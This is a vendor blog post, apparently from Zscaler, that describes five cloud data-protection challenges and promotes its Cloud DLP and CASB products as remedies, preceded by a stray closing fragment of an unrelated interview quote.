opportunities for MOWI when IT comes in as an innovator and a key partner in the business to make sure we add value at every step of the way. And I would like to salute and pay respect to my team because they are doing an awesome job, they delivered and exceeded the expectations of the business and I am really proud of them Robert Berkenpas Five Data Protection Challenges and How to Combat Them Five challenges As the modern workforce evolves and continues to trend toward digital business models, company data and applications are migrating to the cloud from on-premise data centers. While this evolution gives individuals and lines of business (LOBs) more control, reduces cost, and enables businesses to run more efficiently than ever before, it also changes the role of IT from local security enforcers to global business enablers, and increases the need for a unified data protection offering to secure data and prevent data loss. Creating a security strategy to support this shift to a new reality of distributed data and cloud adoption across the organization isn’t simple, and businesses will first need to overcome a number of challenges. Hidden data loss in encrypted traffic – When workers were in-office and on the company network, data and applications resided in central data centers, encrypted traffic was limited, and on-prem solutions were sufficient. With the move to the cloud, encryption has shifted from the exception to the rule. If your data protection solution isn’t classifying and controlling data in encrypted traffic, you will miss the majority of sessions in which data exposure and misuse is a possibility, leaving your organization vulnerable to data loss and breaches. Gaps between data protection services – With the move to the cloud, data is distributed across SaaS and public cloud applications, and each is often created and maintained by individuals and LOBs across the organization. For example, a cloud access security broker (CASB) service is used to secure SaaS applications, while a secure web gateway (SWG) with data loss prevention (DLP) is used to secure internet applications, and cloud security posture management (CSPM) is used to secure public cloud applications. This complexity makes data protection uniformity and communication challenging, and can cause redundant functions and gaps in visibility and control across applications. Limited context when controlling data usage – Granular visibility and control are imperative when protecting company data. Most data protection options provide IT limited visibility into who is attempting access, the user’s location, and the state of the application, limiting the control needed to enable effective and safe data usage and making data protection decisions unnecessarily difficult. Poor user experience – With workers and applications moving from on-prem data centers to the cloud, the infrastructure in use is now the internet itself, limiting IT’s ability to anticipate, identify, and mitigate issues. When the majority of apps used by workers are out of the organization’s control, it becomes more difficult to ensure employees have a good user experience and maintain productivity. Compliance violations across clouds – Failing to meet and maintain required industry regulations can mean hefty fines and even loss of business. With data distributed across cloud applications and services, compliance visibility and remediation ability are reduced, potentially putting your company at risk. Five ways to combat them To combat these challenges and make the transition to the cloud as seamless as possible, your data protection solution and protocols should include: Full SSL inspection of all traffic – Stolen data is often disguised and sent uninspected through SSL, and according to the latest Google Transparency report, 95 percent of traffic is encrypted and therefore not subject to inspection by traditional DLP solutions. Partial inspection of your traffic leaves your business vulnerable to data loss, as sensitive data passing through may be missed. A cloud-based data protection solution can inspect every byte leaving your network, ensuring your data is secure. Unified protections – Provide a consistent level of security to all your users worldwide, whether onsite or remote, by moving your security to the cloud. Zscaler Cloud Data Protection can monitor data in motion across locations with Cloud DLP and unified data at rest across SaaS and public cloud applications with out-of-band CASB. Elastic scale with consistent enforcement – Zscaler prevents sensitive data from leaving your network instead of limiting you to damage control after data has been compromised. With Zscaler Cloud DLP, policy follows users wherever they work—on- or off-network—providing the same level of protection to all users at all times. The Zscaler security cloud scales elastically with performance guaranteed by service-level agreements. Improved user experience – Many appliance-based security offerings require traffic to be backhauled to a central location, creating bottlenecks and causing latency, which directly affects user experience and productivity. A solution that embraces the concept of Secure Access Service Edge (SASE) puts data security as close as possible to the user, reducing latency and significantly improving user experience. Compliance reporting and remediation – Enable unified compliance visibility and control company-wide across internet and SaaS applications using 14 different compliance standards, including Cloud Security Alliance (CSA), GxP, Health Insurance Portability and Accountability Act (HIPAA), and General Data Protection Regulation (GDPR), among others. As data and applications move from the office to the cloud, your company must stay one step ahead to avoid becoming the next victim of data loss. Company and customer data security should be a top priority with a cloud-based data protection solution. To learn more about how to close gaps in your data protection strategy with Zscaler CASB and Cloud DLP, read this white paper or download this eBook. Steve Grossenbacher is a Director of Product Marketing at Zscaler Steve Grossenbacher